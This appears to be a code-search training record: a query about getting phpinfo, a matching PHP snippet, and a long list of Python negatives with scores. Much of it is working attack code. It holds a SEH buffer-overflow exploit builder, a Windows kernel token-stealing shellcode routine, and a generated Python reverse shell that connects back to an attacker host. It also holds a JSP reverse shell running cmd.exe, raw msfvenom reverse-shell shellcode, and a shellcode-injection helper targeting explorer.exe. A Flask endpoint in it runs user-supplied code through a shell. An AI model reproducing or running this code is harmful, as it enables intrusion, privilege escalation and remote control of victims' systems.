"def build_buf(shellcode: bytes = b\"\") -> bytes:\n # bad_chars: \\x00\\x20\\x25\\x2b\\x2f\\x5c\n # *************\n # Buffer Layout\n # *************\n #\n # Overwrite w/ 4061 bytes\n # SEH overwrite 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll]\n # net jump over seh\n # shellcode\n # pad to 500 bytes\n\n payload = b\"A\" * 4061\n payload += struct.pack(\"<L\", 0x04750674) #nseh\n payload += struct.pack(\"<L\", 0x1002324c) #seh\n payload += shellcode\n payload += b\"\\xcc\" * (5000 - len(payload))\n\n buf = b\"GET \"\n buf += payload\n buf += b\" HTTP/1.1\\r\\n\"\n return buf",
"def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)",
"def do_sh(self, none):\n print(\"**** Not Implemented\")",
"def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode",
"def normalize_input_shellcode(shellcode):\n shellcode = shellcode.replace(' ', '')\n shellcode = shellcode.replace('\\\\x', '')\n shellcode = shellcode.replace('\\\\X', '')\n return shellcode",
"def leak_shellcode(remote, shellcode):\n assert len(shellcode) == 3\n alloc_addr = get_current_allocation_addr(remote)\n send_receive(remote, '\\x93' + shellcode) # Start with xchg eax, ebx to leak us\n return alloc_addr + 6",
"def execute_64bits_code_from_syswow(shellcode):\n if not windows.current_process.is_wow_64:\n raise ValueError(\"Calling execute_64bits_code_from_syswow from non-syswow process\")\n addr = windows.winproxy.VirtualAlloc(dwSize=0x1000)\n # post-exec 32bits stub (xor eax, eax; ret)\n ret = \"\\xC3\"\n ret_addr = addr\n shell_code_addr = ret_addr + len(ret) + len(dummy_jump)\n # ljmp\n jump = \"\\xea\" + struct.pack(\"<I\", shell_code_addr) + chr(CS_64bits) + \"\\x00\\x00\"\n jump_addr = ret_addr + len(ret)\n # Return to 32bits stub\n shellcode += genere_return_32bits_stub(ret_addr)\n # WRITE ALL THE STUBS\n windows.current_process.write_memory(ret_addr, ret)\n windows.current_process.write_memory(jump_addr, jump)\n windows.current_process.write_memory(shell_code_addr, shellcode)\n # Execute\n exec_stub = ctypes.CFUNCTYPE(HRESULT)(jump_addr)\n return exec_stub()",
"def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode",
"def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))",
"def create_code_cell(code='', where='below'):\n encoded_code = base64.b64encode(code.encode()).decode()\n display(IPython.display.Javascript(\"\"\"\n var code = IPython.notebook.insert_cell_{0}('code');\n code.set_text(atob(\"{1}\"));\n \"\"\".format(where, encoded_code)))",
"def assemble(self, code):\n try:\n return bytes(self.ks.asm(code)[0])\n except KsError as e:\n print(f\"keystone-error: {e}\")",
"def wrap_command(command: str) -> str: \n\n wrapper = \"\"\"\n sub callback {\n {{COMMAND}};\n }\n\n import java.io.*; \n import java.util.*; \n $baos = [new ByteArrayOutputStream]; \n $oos = [new ObjectOutputStream: $baos]; \n [$oos writeObject: callback()]; \n [$oos close]; \n $encoder = [Base64 getEncoder]; \n println([$encoder encodeToString: [$baos toByteArray]]);\n \"\"\"\n\n # Replace command in wrapper\n wrapper = wrapper.replace(r\"{{COMMAND}}\", command)\n return convert_to_oneline(wrapper)",
"def substshell(command, path=None, output=os.devnull, mode='w'):\n _compile = SubstCommandCompiler(path)\n _compile.init_command(command)\n return functools.partial(_compile, output, mode)",
"def make_shell_context():\n return dict(app=app)"
] |
[
"0.7402912",
"0.73418057",
"0.6836136",
"0.64263725",
"0.63928574",
"0.6227515",
"0.620947",
"0.6156581",
"0.6121463",
"0.60504764",
"0.6037975",
"0.6035005",
"0.60190237",
"0.588461",
"0.58781004",
"0.5792686",
"0.57852757",
"0.56722367",
"0.5576622",
"0.55551994",
"0.5522618",
"0.5507283",
"0.5498769",
"0.5476201",
"0.5474636",
"0.5468697",
"0.5410895",
"0.5368277",
"0.53510904",
"0.5349157"
] |
0.7425078
|
0
|
Function to get phpinfo
|
def get_phpinfo(self, badchars):
phpcode = "<?php phpinfo(); ?>"
return phpcode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def phpinfo(interp, arg):\n if arg & get_const('standard', 'INFO_MODULES'):\n for ext in EXTENSIONS:\n interp.writestr(ext + \"\\n\")\n return interp.space.w_True",
"def phpversion(interp, ext=None):\n if ext:\n return interp.space.w_False\n return interp.config.get_ini_w('php_version')",
"def get_php_version(self) -> dict:\n uri = f\"{self.uri}/\"\n\n response = self.request(uri=uri)\n env_config = response.json()\n return {'php_version': env_config['configuration']['php']['version']}",
"def module_info():\n pass",
"def get_version_info():\n out = \"\\nmpsyt version : %s \" % __version__\n out += \"\\n notes : %s\" % __notes__\n out += \"\\npafy version : %s\" % pafy.__version__\n out += \"\\nPython version : %s\" % sys.version\n out += \"\\nProcessor : %s\" % platform.processor()\n out += \"\\nMachine type : %s\" % platform.machine()\n out += \"\\nArchitecture : %s, %s\" % platform.architecture()\n out += \"\\nPlatform : %s\" % platform.platform()\n out += \"\\nsys.stdout.enc : %s\" % sys.stdout.encoding\n out += \"\\ndefault enc : %s\" % sys.getdefaultencoding()\n out += \"\\nConfig dir : %s\" % get_config_dir()\n envs = \"TERM SHELL LANG LANGUAGE\".split()\n\n for env in envs:\n value = os.environ.get(env)\n out += \"\\nenv:%-11s: %s\" % (env, value) if value else \"\"\n\n return out",
"def _check_and_analyze(self, domain_path, php_info_filename):\n php_info_url = domain_path.url_join(php_info_filename)\n\n response = self._uri_opener.GET(php_info_url,\n cache=True,\n grep=False)\n\n if is_404(response):\n return\n\n # Check if it is a phpinfo file\n php_version = self.PHP_VERSION_RE.search(response.get_body(), re.I)\n sysinfo = self.SYSTEM_RE.search(response.get_body(), re.I)\n\n if not php_version:\n return\n\n if not sysinfo:\n return\n\n # Create the fuzzable request and send it to the core\n fr = FuzzableRequest.from_http_response(response)\n self.output_queue.put(fr)\n\n desc = ('The phpinfo() file was found at: %s. The version'\n ' of PHP is: \"%s\" and the system information is:'\n ' \"%s\".')\n desc %= (response.get_url(), php_version.group(2), sysinfo.group(1))\n\n v = Vuln('phpinfo() file found', desc, severity.MEDIUM,\n response.id, self.get_name())\n v.set_url(response.get_url())\n\n kb.kb.append(self, 'phpinfo', v)\n om.out.vulnerability(v.get_desc(), severity=v.get_severity())\n\n if not self._has_audited:\n self._has_audited = True\n self.audit_phpinfo(response)",
"def have_php_extension(l):\r\n if \".php\" in str(l):\r\n return 1\r\n else:\r\n return 0",
"def get_info():\n global PERF_APP\n archs = None\n best_arch = None\n cipher_algos = None\n hash_algos = None\n aead_algos = None\n\n cmd = PERF_APP + ' --print-info'\n\n try:\n res = subprocess.run(cmd, stdout=subprocess.PIPE, \\\n stderr=subprocess.STDOUT, \\\n env=ENVS, shell=True, check=True)\n output = res.stdout.decode('utf-8')\n except subprocess.CalledProcessError as e:\n print(\"Error (\" + str(e.returncode) + \")\")\n print(e.output.decode('utf-8'))\n sys.exit(1)\n\n lines = output.rstrip().split('\\n')\n try:\n for line in lines:\n info = line.split(':')\n if info[0] == 'Supported architectures':\n archs = info[1].split()\n if info[0] == 'Best architecture':\n best_arch = info[1].split()\n if info[0] == 'Supported cipher algorithms':\n cipher_algos = info[1].split()\n if info[0] == 'Supported hash algorithms':\n hash_algos = info[1].split()\n if info[0] == 'Supported aead algorithms':\n aead_algos = info[1].split()\n except:\n print(\"Error parsing --print-info output:\\n\" \\\n \"{}\".format(output), file=sys.stderr)\n\n if archs is None or best_arch is None or cipher_algos is None \\\n or hash_algos is None or aead_algos is None:\n print(\"Error parsing system and app information\", file=sys.stderr)\n sys.exit(1)\n\n return archs, best_arch, cipher_algos, hash_algos, aead_algos",
"def version_info():\r\n return tuple(map(int, __version__.split('.')))",
"def php_ini_loaded_file():\n raise NotImplementedError()",
"def info() -> None:",
"def local_info():\n local('uname -a')",
"def zend_version(interp):\n return interp.config.get_ini_w('zend_version')",
"def get_module_info():\n\n return {RUNNER_NAME: ('mock runner', MockRunner)}",
"def python_compiler():\n return _sys_version()[6]",
"def info():\n\n print('Maptool\\n--------\\n')\n print('Version: ' + __version__)\n print('Path: ' + __path__[0])\n print('Date: ' + __date__)\n print()\n\n import sys\n print('Python version=' + sys.version + '\\n')\n\n try:\n mm = __import__('pymongo')\n print('%10s %10s %s' % ('pymongo', mm.version, mm.__path__[0]))\n except ImportError:\n print('pymongo Not Found')\n\n for modui in ['numpy', 'scipy', 'mayavi', 'matplotlib', 'tqdm',\n 'future', 'nose', 'coverage', 'spglib', 'pyhull', 'pymatgen', 'qmpy', ]:\n try:\n mm = __import__(modui)\n print('%10s %10s %s' % (modui, mm.__version__, mm.__path__[0]))\n except ImportError:\n print('%10s %10s Not Found' % (modui, ''))\n\n if ASE:\n import ase\n #from ase import version as ase_version\n print('%10s %10s %s' % ('ase', ase.__version__, ase.__path__[0]))\n else:\n print('%10s %10s Not Found' % ('ase', ''))",
"def algorithmInfo():\n\t\treturn r\"\"\"TODO\"\"\"",
"def version():\n\n pass",
"def get_version():\n return 1",
"def info():\n return buildcat.info()",
"def pyzmq_version_info():\n return version_info",
"def system_info() -> str:\n return \"\\n\".join(\n [\n f\"Python version: {platform.python_version()}\",\n f\"Python implementation: {platform.python_implementation()}\",\n f\"Python compiler: {platform.python_compiler()}\",\n f\"PyTorch version: {torch.__version__}\",\n f\"System: {platform.system() or 'Unable to determine'}\",\n f\"System version: {platform.release() or 'Unable to determine'}\",\n f\"Processor: {platform.processor() or 'Unable to determine'}\",\n f\"Number of CPUs: {multiprocessing.cpu_count()}\",\n ]\n )",
"def get_info():\n\n #Determine if running on Linux or Mac.\n if platform.system() == 'Linux':\n linux = True\n\n elif platform.system() == \"Darwin\":\n linux = False\n\n if linux:\n from . import linux\n linux.get_info()\n diskinfo = linux.DISKINFO\n\n else:\n from . import macos\n macos.get_info()\n diskinfo = macos.DISKINFO\n\n return diskinfo",
"def print_info(args):\n print(banner_small)\n display_config_info()\n\n print(\"\")\n print(\"Python Configuration\")\n print(\"-\" * 25)\n print(\"\")\n info_calls = [\"which python3\", \"python3 --version\", \"which pip3\", \"pip3 --version\"]\n info_str = \"\"\n for x in info_calls:\n info_str += 'echo \" $ ' + x + '\" && ' + x + \"\\n\"\n info_str += \"echo \\n\"\n info_str += r\"echo \\\"echo \\$PYTHONPATH\\\" && echo $PYTHONPATH\"\n _ = subprocess.run(info_str, shell=True)\n print(\"\")",
"def get_python_version():\r\n return \"py%i.%i\" % (sys.version_info[0], sys.version_info[1])",
"def sys_info(fname=None, overwrite=False):\n if fname is not None and op.isfile(fname) and not overwrite:\n raise IOError('file exists, use overwrite=True to overwrite')\n\n out = ''\n try:\n # Nest all imports here to avoid any circular imports\n from ..app import use_app, Canvas\n from ..app.backends import BACKEND_NAMES\n from ..gloo import gl\n from ..testing import has_backend\n # get default app\n with use_log_level('warning'):\n app = use_app(call_reuse=False) # suppress messages\n out += 'Platform: %s\\n' % platform.platform()\n out += 'Python: %s\\n' % str(sys.version).replace('\\n', ' ')\n out += 'Backend: %s\\n' % app.backend_name\n for backend in BACKEND_NAMES:\n if backend.startswith('ipynb_'):\n continue\n with use_log_level('warning', print_msg=False):\n which = has_backend(backend, out=['which'])[1]\n out += '{0:<9} {1}\\n'.format(backend + ':', which)\n out += '\\n'\n # We need an OpenGL context to get GL info\n canvas = Canvas('Test', (10, 10), show=False, app=app)\n canvas._backend._vispy_set_current()\n out += 'GL version: %r\\n' % (gl.glGetParameter(gl.GL_VERSION),)\n x_ = gl.GL_MAX_TEXTURE_SIZE\n out += 'MAX_TEXTURE_SIZE: %r\\n' % (gl.glGetParameter(x_),)\n out += 'Extensions: %r\\n' % (gl.glGetParameter(gl.GL_EXTENSIONS),)\n canvas.close()\n except Exception: # don't stop printing info\n out += '\\nInfo-gathering error:\\n%s' % traceback.format_exc()\n pass\n if fname is not None:\n with open(fname, 'w') as fid:\n fid.write(out)\n return out",
"def get_short_code_stats():\n return rh.get_short_code_stats(request)",
"def python_implementation():\n return _sys_version()[0]",
"def python_version():\n return _sys_version()[1]",
"def _proc_info(self):\n ret = cext.proc_info(self.pid)\n assert len(ret) == len(pinfo_map)\n return ret"
] |
[
"0.6446138",
"0.63850063",
"0.59758496",
"0.57701653",
"0.5352841",
"0.53243315",
"0.5187391",
"0.5157908",
"0.51493025",
"0.5139393",
"0.50845015",
"0.5054053",
"0.50187427",
"0.49383837",
"0.49188626",
"0.4916893",
"0.4897124",
"0.4884904",
"0.48526204",
"0.485079",
"0.4848358",
"0.48148084",
"0.4814405",
"0.4808253",
"0.4806849",
"0.47767437",
"0.47690147",
"0.476859",
"0.47433597",
"0.47390267"
] |
0.692314
|
0
|
Function to get java(jsp) shellcode
|
def get_javacode(self, localhost, localport):
if not localhost or not localport:
print "Settings for connectback listener must be defined"
return False
javacode = ""
javacode += """
<%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" %>
<%
for (;;) {
Socket socket = new Socket("LOCALHOST", LOCALPORT);
InputStream inSocket = socket.getInputStream();
BufferedReader s_in = new BufferedReader(new InputStreamReader(inSocket));
OutputStream outSocket = socket.getOutputStream();
char buffer[] = new char[8192];
int length = s_in.read( buffer, 0, buffer.length );
String cmd = String.valueOf(buffer,0, length);
Process p = new ProcessBuilder("cmd.exe", "/C", cmd).redirectErrorStream(true).start();
InputStream is = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
String in;
String all = "";
while ((in = br.readLine()) != null) {
all = all + in + "\\n\\r";
}
outSocket.write(all.getBytes());
socket.close();
}
%>"""
javacode = javacode.replace("LOCALHOST", str(localhost))
javacode = javacode.replace("LOCALPORT", str(localport))
return javacode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code",
"def java(self):\r\n return self.binary('java')",
"def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)",
"def run_next_action():\n os.environ[\"BROWSER\"] = 'echo %s'\n result = subprocess.run(context.arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding=\"utf-8\")\n return result.stdout + result.stderr",
"def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode",
"def _get_command_result(java_path: str) -> str:\n return exec_command([java_path, \"-version\"], use_stderr=True)",
"def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))",
"def return_py_script(path):\n old_stdout = sys.stdout\n sys.stdout = mystdout = StringIO()\n exec(open(path).read())\n sys.stdout = old_stdout\n content = mystdout.getvalue()\n if \"<http>\" in content:\n mime_type = b\"text/html\"\n else:\n mime_type = b\"text/plain\"\n content = content.encode()\n return content, mime_type",
"def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode",
"def run_python(request):\r\n if not request.user.is_staff:\r\n raise Http404\r\n c = {}\r\n c['code'] = ''\r\n c['results'] = None\r\n if request.method == 'POST':\r\n py_code = c['code'] = request.POST.get('code')\r\n g = {}\r\n try:\r\n safe_exec(py_code, g)\r\n except Exception as e:\r\n c['results'] = traceback.format_exc()\r\n else:\r\n c['results'] = pprint.pformat(g)\r\n return render_to_response(\"debug/run_python_form.html\", c)",
"def _command_template(self, switches):\n\n command = [\"java\", \"-jar\", self.file_jar, \"-eUTF-8\"]\n\n if self.memory_allocation:\n command.append(\"-Xmx{}\".format(self.memory_allocation))\n\n command.extend(switches)\n\n if six.PY2:\n with open(os.devnull, \"w\") as devnull:\n out = subprocess.Popen(\n command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=devnull)\n elif six.PY3:\n out = subprocess.Popen(\n command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n\n stdoutdata, _ = out.communicate()\n\n return stdoutdata.decode(\"utf-8\").strip()",
"def get_shell(self, shell):",
"def provided_or_last(s=None, shell=None):\n if shell is None:\n shell = get_ipython()\n if shell is None:\n return\n if s is not None:\n code_to_page = shell.find_user_code(s, skip_encoding_cookie=True)\n else:\n # noinspection PyProtectedMember\n code_to_page = shell._i\n\n return code_to_page",
"def get_code(path):\n if path is None:\n return pasteboard.get()\n else:\n with open(path, 'r', encoding='UTF-8') as html_file:\n code = html_file.read()\n return code",
"def get_executable(self) -> str:\n ...",
"def generateShellcode(self, listener: str, staged: bool = False, x64: bool = True) -> bytes:\t\t\n\t\treturn self.generatePayload(listener, ArtifactType.RAW, staged=staged, x64=x64)",
"def version_from_path(cls, tools: ToolCache, java_path: str | Path) -> str:\n output = tools.subprocess.check_output(\n [\n os.fsdecode(Path(java_path) / \"bin\" / \"javac\"),\n \"-version\",\n ],\n )\n # javac's output should look like \"javac 17.0.X\\n\"\n return output.strip(\"\\n\").split(\" \")[1]",
"def get(self):\r\n #python = sys.executable\r\n #os.execl(python, python, * sys.argv)\r\n os.execl(sys.executable, *([sys.executable] + sys.argv))",
"def get_rtmpdump_cmd(pid):\n url = URL_BASE + CONVERT.format(pid)\n root = lxml.html.parse(url)\n codes = root.findall('.//p/code')\n if len(codes) == 1:\n return codes[0].text\n elif len(codes) < 1:\n print 'pid2rtmpdump: <p><code> not found!'\n return False\n else:\n print 'pid2rtmpdump: more than one <p><code> elements found: {0}'.format(len(codes))\n return False",
"def shell(cmd):\n return subprocess.check_output(cmd, shell=True).decode(\"utf-8\")",
"def index(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [str.encode('''Hello World Application\n This is the Hello World application:\n\n`continue <hello/>`_\n\n''')]",
